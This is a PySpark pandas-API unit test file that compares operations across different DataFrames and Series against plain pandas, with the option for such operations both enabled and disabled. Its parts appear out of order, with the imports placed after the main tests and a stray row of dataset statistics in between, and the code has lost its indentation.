"cannot set using a list-like indexer with a different length than the value",
):
kiloc[[1, 2]] = -psser_another
kiloc[[0, 1, 2]] = 10 * psser_another
piloc[[0, 1, 2]] = 10 * pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
with self.assertRaisesRegex(
ValueError,
"cannot set using a list-like indexer with a different length than the value",
):
kiloc[[0]] = 10 * psser_another
def test_update(self):
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [10, 20, 30]})
psdf = ps.from_pandas(pdf)
pser = pdf.x
psser = psdf.x
pser.update(pd.Series([4, 5, 6]))
psser.update(ps.Series([4, 5, 6]))
self.assert_eq(psser.sort_index(), pser.sort_index())
self.assert_eq(psdf.sort_index(), pdf.sort_index())
def test_where(self):
pdf1 = pd.DataFrame({"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]})
pdf2 = pd.DataFrame({"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]})
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1.where(pdf2 > 100), psdf1.where(psdf2 > 100).sort_index())
pdf1 = pd.DataFrame({"A": [-1, -2, -3, -4, -5], "B": [-100, -200, -300, -400, -500]})
pdf2 = pd.DataFrame({"A": [-10, -20, -30, -40, -50], "B": [-5, -4, -3, -2, -1]})
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1.where(pdf2 < -250), psdf1.where(psdf2 < -250).sort_index())
# multi-index columns
pdf1 = pd.DataFrame({("X", "A"): [0, 1, 2, 3, 4], ("X", "B"): [100, 200, 300, 400, 500]})
pdf2 = pd.DataFrame(
{("X", "A"): [0, -1, -2, -3, -4], ("X", "B"): [-100, -200, -300, -400, -500]}
)
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1.where(pdf2 > 100), psdf1.where(psdf2 > 100).sort_index())
def test_mask(self):
pdf1 = pd.DataFrame({"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]})
pdf2 = pd.DataFrame({"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]})
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1.mask(pdf2 < 100), psdf1.mask(psdf2 < 100).sort_index())
pdf1 = pd.DataFrame({"A": [-1, -2, -3, -4, -5], "B": [-100, -200, -300, -400, -500]})
pdf2 = pd.DataFrame({"A": [-10, -20, -30, -40, -50], "B": [-5, -4, -3, -2, -1]})
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1.mask(pdf2 > -250), psdf1.mask(psdf2 > -250).sort_index())
# multi-index columns
pdf1 = pd.DataFrame({("X", "A"): [0, 1, 2, 3, 4], ("X", "B"): [100, 200, 300, 400, 500]})
pdf2 = pd.DataFrame(
{("X", "A"): [0, -1, -2, -3, -4], ("X", "B"): [-100, -200, -300, -400, -500]}
)
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1.mask(pdf2 < 100), psdf1.mask(psdf2 < 100).sort_index())
def test_multi_index_column_assignment_frame(self):
pdf = pd.DataFrame({"a": [1, 2, 3, 2], "b": [4.0, 2.0, 3.0, 1.0]})
pdf.columns = pd.MultiIndex.from_tuples([("a", "x"), ("a", "y")])
psdf = ps.DataFrame(pdf)
psdf["c"] = ps.Series([10, 20, 30, 20])
pdf["c"] = pd.Series([10, 20, 30, 20])
psdf[("d", "x")] = ps.Series([100, 200, 300, 200], name="1")
pdf[("d", "x")] = pd.Series([100, 200, 300, 200], name="1")
psdf[("d", "y")] = ps.Series([1000, 2000, 3000, 2000], name=("1", "2"))
pdf[("d", "y")] = pd.Series([1000, 2000, 3000, 2000], name=("1", "2"))
psdf["e"] = ps.Series([10000, 20000, 30000, 20000], name=("1", "2", "3"))
pdf["e"] = pd.Series([10000, 20000, 30000, 20000], name=("1", "2", "3"))
psdf[[("f", "x"), ("f", "y")]] = ps.DataFrame(
{"1": [100000, 200000, 300000, 200000], "2": [1000000, 2000000, 3000000, 2000000]}
)
pdf[[("f", "x"), ("f", "y")]] = pd.DataFrame(
{"1": [100000, 200000, 300000, 200000], "2": [1000000, 2000000, 3000000, 2000000]}
)
self.assert_eq(repr(psdf.sort_index()), repr(pdf))
with self.assertRaisesRegex(KeyError, "Key length \\(3\\) exceeds index depth \\(2\\)"):
psdf[("1", "2", "3")] = ps.Series([100, 200, 300, 200])
def test_series_dot(self):
pser = pd.Series([90, 91, 85], index=[2, 4, 1])
psser = ps.from_pandas(pser)
pser_other = pd.Series([90, 91, 85], index=[2, 4, 1])
psser_other = ps.from_pandas(pser_other)
self.assert_eq(psser.dot(psser_other), pser.dot(pser_other))
psser_other = ps.Series([90, 91, 85], index=[1, 2, 4])
pser_other = pd.Series([90, 91, 85], index=[1, 2, 4])
self.assert_eq(psser.dot(psser_other), pser.dot(pser_other))
# length of index is different
psser_other = ps.Series([90, 91, 85, 100], index=[2, 4, 1, 0])
with self.assertRaisesRegex(ValueError, "matrices are not aligned"):
psser.dot(psser_other)
# for MultiIndex
midx = pd.MultiIndex(
[["lama", "cow", "falcon"], ["speed", "weight", "length"]],
[[0, 0, 0, 1, 1, 1, 2, 2, 2], [0, 1, 2, 0, 1, 2, 0, 1, 2]],
)
pser = pd.Series([45, 200, 1.2, 30, 250, 1.5, 320, 1, 0.3], index=midx)
psser = ps.from_pandas(pser)
pser_other = pd.Series([-450, 20, 12, -30, -250, 15, -320, 100, 3], index=midx)
psser_other = ps.from_pandas(pser_other)
self.assert_eq(psser.dot(psser_other), pser.dot(pser_other))
pser = pd.Series([0, 1, 2, 3])
psser = ps.from_pandas(pser)
# DataFrame "other" without Index/MultiIndex as columns
pdf = pd.DataFrame([[0, 1], [-2, 3], [4, -5], [6, 7]])
psdf = ps.from_pandas(pdf)
self.assert_eq(psser.dot(psdf), pser.dot(pdf))
# DataFrame "other" with Index as columns
pdf.columns = pd.Index(["x", "y"])
psdf = ps.from_pandas(pdf)
self.assert_eq(psser.dot(psdf), pser.dot(pdf))
pdf.columns = pd.Index(["x", "y"], name="cols_name")
psdf = ps.from_pandas(pdf)
self.assert_eq(psser.dot(psdf), pser.dot(pdf))
pdf = pdf.reindex([1, 0, 2, 3])
psdf = ps.from_pandas(pdf)
self.assert_eq(psser.dot(psdf), pser.dot(pdf))
# DataFrame "other" with MultiIndex as columns
pdf.columns = pd.MultiIndex.from_tuples([("a", "x"), ("b", "y")])
psdf = ps.from_pandas(pdf)
self.assert_eq(psser.dot(psdf), pser.dot(pdf))
pdf.columns = pd.MultiIndex.from_tuples(
[("a", "x"), ("b", "y")], names=["cols_name1", "cols_name2"]
)
psdf = ps.from_pandas(pdf)
self.assert_eq(psser.dot(psdf), pser.dot(pdf))
psser = ps.DataFrame({"a": [1, 2, 3], "b": [4, 5, 6]}).b
pser = psser.to_pandas()
psdf = ps.DataFrame({"c": [7, 8, 9]})
pdf = psdf.to_pandas()
self.assert_eq(psser.dot(psdf), pser.dot(pdf))
def test_frame_dot(self):
pdf = pd.DataFrame([[0, 1, -2, -1], [1, 1, 1, 1]])
psdf = ps.from_pandas(pdf)
pser = pd.Series([1, 1, 2, 1])
psser = ps.from_pandas(pser)
self.assert_eq(psdf.dot(psser), pdf.dot(pser))
# Index reorder
pser = pser.reindex([1, 0, 2, 3])
psser = ps.from_pandas(pser)
self.assert_eq(psdf.dot(psser), pdf.dot(pser))
# ser with name
pser.name = "ser"
psser = ps.from_pandas(pser)
self.assert_eq(psdf.dot(psser), pdf.dot(pser))
# df with MultiIndex as column (ser with MultiIndex)
arrays = [[1, 1, 2, 2], ["red", "blue", "red", "blue"]]
pidx = pd.MultiIndex.from_arrays(arrays, names=("number", "color"))
pser = pd.Series([1, 1, 2, 1], index=pidx)
pdf = pd.DataFrame([[0, 1, -2, -1], [1, 1, 1, 1]], columns=pidx)
psdf = ps.from_pandas(pdf)
psser = ps.from_pandas(pser)
self.assert_eq(psdf.dot(psser), pdf.dot(pser))
# df with Index as column (ser with Index)
pidx = pd.Index([1, 2, 3, 4], name="number")
pser = pd.Series([1, 1, 2, 1], index=pidx)
pdf = pd.DataFrame([[0, 1, -2, -1], [1, 1, 1, 1]], columns=pidx)
psdf = ps.from_pandas(pdf)
psser = ps.from_pandas(pser)
self.assert_eq(psdf.dot(psser), pdf.dot(pser))
# df with Index
pdf.index = pd.Index(["x", "y"], name="char")
psdf = ps.from_pandas(pdf)
self.assert_eq(psdf.dot(psser), pdf.dot(pser))
# df with MultiIndex
pdf.index = pd.MultiIndex.from_arrays([[1, 1], ["red", "blue"]], names=("number", "color"))
psdf = ps.from_pandas(pdf)
self.assert_eq(psdf.dot(psser), pdf.dot(pser))
pdf = pd.DataFrame([[1, 2], [3, 4]])
psdf = ps.from_pandas(pdf)
self.assert_eq(psdf.dot(psdf[0]), pdf.dot(pdf[0]))
self.assert_eq(psdf.dot(psdf[0] * 10), pdf.dot(pdf[0] * 10))
self.assert_eq((psdf + 1).dot(psdf[0] * 10), (pdf + 1).dot(pdf[0] * 10))
def test_to_series_comparison(self):
psidx1 = ps.Index([1, 2, 3, 4, 5])
psidx2 = ps.Index([1, 2, 3, 4, 5])
self.assert_eq((psidx1.to_series() == psidx2.to_series()).all(), True)
psidx1.name = "koalas"
psidx2.name = "koalas"
self.assert_eq((psidx1.to_series() == psidx2.to_series()).all(), True)
def test_series_repeat(self):
pser1 = pd.Series(["a", "b", "c"], name="a")
pser2 = pd.Series([10, 20, 30], name="rep")
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
self.assert_eq(psser1.repeat(psser2).sort_index(), pser1.repeat(pser2).sort_index())
def test_series_ops(self):
pser1 = pd.Series([1, 2, 3, 4, 5, 6, 7], name="x", index=[11, 12, 13, 14, 15, 16, 17])
pser2 = pd.Series([1, 2, 3, 4, 5, 6, 7], name="x", index=[11, 12, 13, 14, 15, 16, 17])
pidx1 = pd.Index([10, 11, 12, 13, 14, 15, 16], name="x")
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
psidx1 = ps.from_pandas(pidx1)
self.assert_eq(
(psser1 + 1 + 10 * psser2).sort_index(), (pser1 + 1 + 10 * pser2).sort_index()
)
self.assert_eq(
(psser1 + 1 + 10 * psser2.rename()).sort_index(),
(pser1 + 1 + 10 * pser2.rename()).sort_index(),
)
self.assert_eq(
(psser1.rename() + 1 + 10 * psser2).sort_index(),
(pser1.rename() + 1 + 10 * pser2).sort_index(),
)
self.assert_eq(
(psser1.rename() + 1 + 10 * psser2.rename()).sort_index(),
(pser1.rename() + 1 + 10 * pser2.rename()).sort_index(),
)
self.assert_eq(psser1 + 1 + 10 * psidx1, pser1 + 1 + 10 * pidx1)
self.assert_eq(psser1.rename() + 1 + 10 * psidx1, pser1.rename() + 1 + 10 * pidx1)
self.assert_eq(psser1 + 1 + 10 * psidx1.rename(None), pser1 + 1 + 10 * pidx1.rename(None))
self.assert_eq(
psser1.rename() + 1 + 10 * psidx1.rename(None),
pser1.rename() + 1 + 10 * pidx1.rename(None),
)
self.assert_eq(psidx1 + 1 + 10 * psser1, pidx1 + 1 + 10 * pser1)
self.assert_eq(psidx1 + 1 + 10 * psser1.rename(), pidx1 + 1 + 10 * pser1.rename())
self.assert_eq(psidx1.rename(None) + 1 + 10 * psser1, pidx1.rename(None) + 1 + 10 * pser1)
self.assert_eq(
psidx1.rename(None) + 1 + 10 * psser1.rename(),
pidx1.rename(None) + 1 + 10 * pser1.rename(),
)
pidx2 = pd.Index([11, 12, 13])
psidx2 = ps.from_pandas(pidx2)
with self.assertRaisesRegex(
ValueError, "operands could not be broadcast together with shapes"
):
psser1 + psidx2
with self.assertRaisesRegex(
ValueError, "operands could not be broadcast together with shapes"
):
psidx2 + psser1
def test_index_ops(self):
pidx1 = pd.Index([1, 2, 3, 4, 5], name="x")
pidx2 = pd.Index([6, 7, 8, 9, 10], name="x")
psidx1 = ps.from_pandas(pidx1)
psidx2 = ps.from_pandas(pidx2)
self.assert_eq(psidx1 * 10 + psidx2, pidx1 * 10 + pidx2)
self.assert_eq(psidx1.rename(None) * 10 + psidx2, pidx1.rename(None) * 10 + pidx2)
if LooseVersion(pd.__version__) >= LooseVersion("1.0"):
self.assert_eq(psidx1 * 10 + psidx2.rename(None), pidx1 * 10 + pidx2.rename(None))
else:
self.assert_eq(
psidx1 * 10 + psidx2.rename(None), (pidx1 * 10 + pidx2.rename(None)).rename(None)
)
pidx3 = pd.Index([11, 12, 13])
psidx3 = ps.from_pandas(pidx3)
with self.assertRaisesRegex(
ValueError, "operands could not be broadcast together with shapes"
):
psidx1 + psidx3
pidx1 = pd.Index([1, 2, 3, 4, 5], name="a")
pidx2 = pd.Index([6, 7, 8, 9, 10], name="a")
pidx3 = pd.Index([11, 12, 13, 14, 15], name="x")
psidx1 = ps.from_pandas(pidx1)
psidx2 = ps.from_pandas(pidx2)
psidx3 = ps.from_pandas(pidx3)
self.assert_eq(psidx1 * 10 + psidx2, pidx1 * 10 + pidx2)
if LooseVersion(pd.__version__) >= LooseVersion("1.0"):
self.assert_eq(psidx1 * 10 + psidx3, pidx1 * 10 + pidx3)
else:
self.assert_eq(psidx1 * 10 + psidx3, (pidx1 * 10 + pidx3).rename(None))
def test_align(self):
pdf1 = pd.DataFrame({"a": [1, 2, 3], "b": ["a", "b", "c"]}, index=[10, 20, 30])
pdf2 = pd.DataFrame({"a": [4, 5, 6], "c": ["d", "e", "f"]}, index=[10, 11, 12])
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
for join in ["outer", "inner", "left", "right"]:
for axis in [None, 0]:
psdf_l, psdf_r = psdf1.align(psdf2, join=join, axis=axis)
pdf_l, pdf_r = pdf1.align(pdf2, join=join, axis=axis)
self.assert_eq(psdf_l.sort_index(), pdf_l.sort_index())
self.assert_eq(psdf_r.sort_index(), pdf_r.sort_index())
pser1 = pd.Series([7, 8, 9], index=[10, 11, 12])
pser2 = pd.Series(["g", "h", "i"], index=[10, 20, 30])
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
for join in ["outer", "inner", "left", "right"]:
psser_l, psser_r = psser1.align(psser2, join=join)
pser_l, pser_r = pser1.align(pser2, join=join)
self.assert_eq(psser_l.sort_index(), pser_l.sort_index())
self.assert_eq(psser_r.sort_index(), pser_r.sort_index())
psdf_l, psser_r = psdf1.align(psser1, join=join, axis=0)
pdf_l, pser_r = pdf1.align(pser1, join=join, axis=0)
self.assert_eq(psdf_l.sort_index(), pdf_l.sort_index())
self.assert_eq(psser_r.sort_index(), pser_r.sort_index())
psser_l, psdf_r = psser1.align(psdf1, join=join)
pser_l, pdf_r = pser1.align(pdf1, join=join)
self.assert_eq(psser_l.sort_index(), pser_l.sort_index())
self.assert_eq(psdf_r.sort_index(), pdf_r.sort_index())
# multi-index columns
pdf3 = pd.DataFrame(
{("x", "a"): [4, 5, 6], ("y", "c"): ["d", "e", "f"]}, index=[10, 11, 12]
)
psdf3 = ps.from_pandas(pdf3)
pser3 = pdf3[("y", "c")]
psser3 = psdf3[("y", "c")]
for join in ["outer", "inner", "left", "right"]:
psdf_l, psdf_r = psdf1.align(psdf3, join=join, axis=0)
pdf_l, pdf_r = pdf1.align(pdf3, join=join, axis=0)
self.assert_eq(psdf_l.sort_index(), pdf_l.sort_index())
self.assert_eq(psdf_r.sort_index(), pdf_r.sort_index())
psser_l, psser_r = psser1.align(psser3, join=join)
pser_l, pser_r = pser1.align(pser3, join=join)
self.assert_eq(psser_l.sort_index(), pser_l.sort_index())
self.assert_eq(psser_r.sort_index(), pser_r.sort_index())
psdf_l, psser_r = psdf1.align(psser3, join=join, axis=0)
pdf_l, pser_r = pdf1.align(pser3, join=join, axis=0)
self.assert_eq(psdf_l.sort_index(), pdf_l.sort_index())
self.assert_eq(psser_r.sort_index(), pser_r.sort_index())
psser_l, psdf_r = psser3.align(psdf1, join=join)
pser_l, pdf_r = pser3.align(pdf1, join=join)
self.assert_eq(psser_l.sort_index(), pser_l.sort_index())
self.assert_eq(psdf_r.sort_index(), pdf_r.sort_index())
self.assertRaises(ValueError, lambda: psdf1.align(psdf3, axis=None))
self.assertRaises(ValueError, lambda: psdf1.align(psdf3, axis=1))
def test_pow_and_rpow(self):
pser = pd.Series([1, 2, np.nan])
psser = ps.from_pandas(pser)
pser_other = pd.Series([np.nan, 2, 3])
psser_other = ps.from_pandas(pser_other)
self.assert_eq(pser.pow(pser_other), psser.pow(psser_other).sort_index())
self.assert_eq(pser ** pser_other, (psser ** psser_other).sort_index())
self.assert_eq(pser.rpow(pser_other), psser.rpow(psser_other).sort_index())
def test_shift(self):
pdf = pd.DataFrame(
{
"Col1": [10, 20, 15, 30, 45],
"Col2": [13, 23, 18, 33, 48],
"Col3": [17, 27, 22, 37, 52],
},
index=np.random.rand(5),
)
psdf = ps.from_pandas(pdf)
self.assert_eq(
pdf.shift().loc[pdf["Col1"] == 20].astype(int), psdf.shift().loc[psdf["Col1"] == 20]
)
self.assert_eq(
pdf["Col2"].shift().loc[pdf["Col1"] == 20].astype(int),
psdf["Col2"].shift().loc[psdf["Col1"] == 20],
)
def test_diff(self):
pdf = pd.DataFrame(
{
"Col1": [10, 20, 15, 30, 45],
"Col2": [13, 23, 18, 33, 48],
"Col3": [17, 27, 22, 37, 52],
},
index=np.random.rand(5),
)
psdf = ps.from_pandas(pdf)
self.assert_eq(
pdf.diff().loc[pdf["Col1"] == 20].astype(int), psdf.diff().loc[psdf["Col1"] == 20]
)
self.assert_eq(
pdf["Col2"].diff().loc[pdf["Col1"] == 20].astype(int),
psdf["Col2"].diff().loc[psdf["Col1"] == 20],
)
def test_rank(self):
pdf = pd.DataFrame(
{
"Col1": [10, 20, 15, 30, 45],
"Col2": [13, 23, 18, 33, 48],
"Col3": [17, 27, 22, 37, 52],
},
index=np.random.rand(5),
)
psdf = ps.from_pandas(pdf)
self.assert_eq(pdf.rank().loc[pdf["Col1"] == 20], psdf.rank().loc[psdf["Col1"] == 20])
self.assert_eq(
pdf["Col2"].rank().loc[pdf["Col1"] == 20], psdf["Col2"].rank().loc[psdf["Col1"] == 20]
)
class OpsOnDiffFramesDisabledTest(PandasOnSparkTestCase, SQLTestUtils):
@classmethod
def setUpClass(cls):
super().setUpClass()
set_option("compute.ops_on_diff_frames", False)
@classmethod
def tearDownClass(cls):
reset_option("compute.ops_on_diff_frames")
super().tearDownClass()
@property
def pdf1(self):
return pd.DataFrame(
{"a": [1, 2, 3, 4, 5, 6, 7, 8, 9], "b": [4, 5, 6, 3, 2, 1, 0, 0, 0]},
index=[0, 1, 3, 5, 6, 8, 9, 9, 9],
)
@property
def pdf2(self):
return pd.DataFrame(
{"a": [9, 8, 7, 6, 5, 4, 3, 2, 1], "b": [0, 0, 0, 4, 5, 6, 1, 2, 3]},
index=list(range(9)),
)
@property
def psdf1(self):
return ps.from_pandas(self.pdf1)
@property
def psdf2(self):
return ps.from_pandas(self.pdf2)
def test_arithmetic(self):
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
self.psdf1.a - self.psdf2.b
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
self.psdf1.a - self.psdf2.a
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
self.psdf1["a"] - self.psdf2["a"]
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
self.psdf1 - self.psdf2
def test_assignment(self):
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf = ps.from_pandas(self.pdf1)
psdf["c"] = self.psdf1.a
def test_frame_loc_setitem(self):
pdf = pd.DataFrame(
[[1, 2], [4, 5], [7, 8]],
index=["cobra", "viper", "sidewinder"],
columns=["max_speed", "shield"],
)
psdf = ps.DataFrame(pdf)
another_psdf = ps.DataFrame(pdf)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf.loc[["viper", "sidewinder"], ["shield"]] = another_psdf.max_speed
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf.loc[another_psdf.max_speed < 5, ["shield"]] = -psdf.max_speed
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf.loc[another_psdf.max_speed < 5, ["shield"]] = -another_psdf.max_speed
def test_frame_iloc_setitem(self):
pdf = pd.DataFrame(
[[1, 2], [4, 5], [7, 8]],
index=["cobra", "viper", "sidewinder"],
columns=["max_speed", "shield"],
)
psdf = ps.DataFrame(pdf)
another_psdf = ps.DataFrame(pdf)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf.iloc[[1, 2], [1]] = another_psdf.max_speed.iloc[[1, 2]]
def test_series_loc_setitem(self):
pser = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
psser = ps.from_pandas(pser)
pser_another = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
psser_another = ps.from_pandas(pser_another)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psser.loc[psser % 2 == 1] = -psser_another
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psser.loc[psser_another % 2 == 1] = -psser
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psser.loc[psser_another % 2 == 1] = -psser_another
def test_series_iloc_setitem(self):
pser = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
psser = ps.from_pandas(pser)
pser_another = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
psser_another = ps.from_pandas(pser_another)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psser.iloc[[1]] = -psser_another.iloc[[1]]
def test_where(self):
pdf1 = pd.DataFrame({"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]})
pdf2 = pd.DataFrame({"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]})
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf1.where(psdf2 > 100)
pdf1 = pd.DataFrame({"A": [-1, -2, -3, -4, -5], "B": [-100, -200, -300, -400, -500]})
pdf2 = pd.DataFrame({"A": [-10, -20, -30, -40, -50], "B": [-5, -4, -3, -2, -1]})
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf1.where(psdf2 < -250)
def test_mask(self):
pdf1 = pd.DataFrame({"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]})
pdf2 = pd.DataFrame({"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]})
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf1.mask(psdf2 < 100)
pdf1 = pd.DataFrame({"A": [-1, -2, -3, -4, -5], "B": [-100, -200, -300, -400, -500]})
pdf2 = pd.DataFrame({"A": [-10, -20, -30, -40, -50], "B": [-5, -4, -3, -2, -1]})
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf1.mask(psdf2 > -250)
def test_align(self):
pdf1 = pd.DataFrame({"a": [1, 2, 3], "b": ["a", "b", "c"]}, index=[10, 20, 30])
pdf2 = pd.DataFrame({"a": [4, 5, 6], "c": ["d", "e", "f"]}, index=[10, 11, 12])
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf1.align(psdf2)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf1.align(psdf2, axis=0)
def test_pow_and_rpow(self):
pser = pd.Series([1, 2, np.nan])
psser = ps.from_pandas(pser)
pser_other = pd.Series([np.nan, 2, 3])
psser_other = ps.from_pandas(pser_other)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psser.pow(psser_other)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psser ** psser_other
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psser.rpow(psser_other)
def test_combine_first(self):
pdf1 = pd.DataFrame({"A": [None, 0], "B": [4, None]})
psdf1 = ps.from_pandas(pdf1)
self.assertRaises(TypeError, lambda: psdf1.combine_first(ps.Series([1, 2])))
pser1 = pd.Series({"falcon": 330.0, "eagle": 160.0})
pser2 = pd.Series({"falcon": 345.0, "eagle": 200.0, "duck": 30.0})
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psser1.combine_first(psser2)
pdf1 = pd.DataFrame({"A": [None, 0], "B": [4, None]})
psdf1 = ps.from_pandas(pdf1)
pdf2 = pd.DataFrame({"C": [3, 3], "B": [1, 1]})
psdf2 = ps.from_pandas(pdf2)
with self.assertRaisesRegex(ValueError, "Cannot combine the series or dataframe"):
psdf1.combine_first(psdf2)
if __name__ == "__main__":
from pyspark.pandas.tests.test_ops_on_diff_frames import * # noqa: F401
try:
import xmlrunner # type: ignore[import]
testRunner = xmlrunner.XMLTestRunner(output="target/test-reports", verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
| 38.4333 | 100 | 0.534997 |
from distutils.version import LooseVersion
from itertools import product
import unittest
import pandas as pd
import numpy as np
from pyspark import pandas as ps
from pyspark.pandas.config import set_option, reset_option
from pyspark.pandas.frame import DataFrame
from pyspark.testing.pandasutils import PandasOnSparkTestCase
from pyspark.testing.sqlutils import SQLTestUtils
from pyspark.pandas.typedef.typehints import (
extension_dtypes,
extension_dtypes_available,
extension_float_dtypes_available,
extension_object_dtypes_available,
)
class OpsOnDiffFramesEnabledTest(PandasOnSparkTestCase, SQLTestUtils):
@classmethod
def setUpClass(cls):
super().setUpClass()
set_option("compute.ops_on_diff_frames", True)
@classmethod
def tearDownClass(cls):
reset_option("compute.ops_on_diff_frames")
super().tearDownClass()
@property
def pdf1(self):
return pd.DataFrame(
{"a": [1, 2, 3, 4, 5, 6, 7, 8, 9], "b": [4, 5, 6, 3, 2, 1, 0, 0, 0]},
index=[0, 1, 3, 5, 6, 8, 9, 10, 11],
)
@property
def pdf2(self):
return pd.DataFrame(
{"a": [9, 8, 7, 6, 5, 4, 3, 2, 1], "b": [0, 0, 0, 4, 5, 6, 1, 2, 3]},
index=list(range(9)),
)
@property
def pdf3(self):
return pd.DataFrame(
{"b": [1, 1, 1, 1, 1, 1, 1, 1, 1], "c": [1, 1, 1, 1, 1, 1, 1, 1, 1]},
index=list(range(9)),
)
@property
def pdf4(self):
return pd.DataFrame(
{"e": [2, 2, 2, 2, 2, 2, 2, 2, 2], "f": [2, 2, 2, 2, 2, 2, 2, 2, 2]},
index=list(range(9)),
)
@property
def pdf5(self):
return pd.DataFrame(
{
"a": [1, 2, 3, 4, 5, 6, 7, 8, 9],
"b": [4, 5, 6, 3, 2, 1, 0, 0, 0],
"c": [4, 5, 6, 3, 2, 1, 0, 0, 0],
},
index=[0, 1, 3, 5, 6, 8, 9, 10, 11],
).set_index(["a", "b"])
@property
def pdf6(self):
return pd.DataFrame(
{
"a": [9, 8, 7, 6, 5, 4, 3, 2, 1],
"b": [0, 0, 0, 4, 5, 6, 1, 2, 3],
"c": [9, 8, 7, 6, 5, 4, 3, 2, 1],
"e": [4, 5, 6, 3, 2, 1, 0, 0, 0],
},
index=list(range(9)),
).set_index(["a", "b"])
@property
def pser1(self):
midx = pd.MultiIndex(
[["lama", "cow", "falcon", "koala"], ["speed", "weight", "length", "power"]],
[[0, 3, 1, 1, 1, 2, 2, 2], [0, 2, 0, 3, 2, 0, 1, 3]],
)
return pd.Series([45, 200, 1.2, 30, 250, 1.5, 320, 1], index=midx)
@property
def pser2(self):
midx = pd.MultiIndex(
[["lama", "cow", "falcon"], ["speed", "weight", "length"]],
[[0, 0, 0, 1, 1, 1, 2, 2, 2], [0, 1, 2, 0, 1, 2, 0, 1, 2]],
)
return pd.Series([-45, 200, -1.2, 30, -250, 1.5, 320, 1, -0.3], index=midx)
@property
def pser3(self):
midx = pd.MultiIndex(
[["koalas", "cow", "falcon"], ["speed", "weight", "length"]],
[[0, 0, 0, 1, 1, 1, 2, 2, 2], [1, 1, 2, 0, 0, 2, 2, 2, 1]],
)
return pd.Series([45, 200, 1.2, 30, 250, 1.5, 320, 1, 0.3], index=midx)
@property
def psdf1(self):
return ps.from_pandas(self.pdf1)
@property
def psdf2(self):
return ps.from_pandas(self.pdf2)
@property
def psdf3(self):
return ps.from_pandas(self.pdf3)
@property
def psdf4(self):
return ps.from_pandas(self.pdf4)
@property
def psdf5(self):
return ps.from_pandas(self.pdf5)
@property
def psdf6(self):
return ps.from_pandas(self.pdf6)
@property
def psser1(self):
return ps.from_pandas(self.pser1)
@property
def psser2(self):
return ps.from_pandas(self.pser2)
@property
def psser3(self):
return ps.from_pandas(self.pser3)
def test_ranges(self):
self.assert_eq(
(ps.range(10) + ps.range(10)).sort_index(),
(
ps.DataFrame({"id": list(range(10))}) + ps.DataFrame({"id": list(range(10))})
).sort_index(),
)
def test_no_matched_index(self):
with self.assertRaisesRegex(ValueError, "Index names must be exactly matched"):
ps.DataFrame({"a": [1, 2, 3]}).set_index("a") + ps.DataFrame(
{"b": [1, 2, 3]}
).set_index("b")
def test_arithmetic(self):
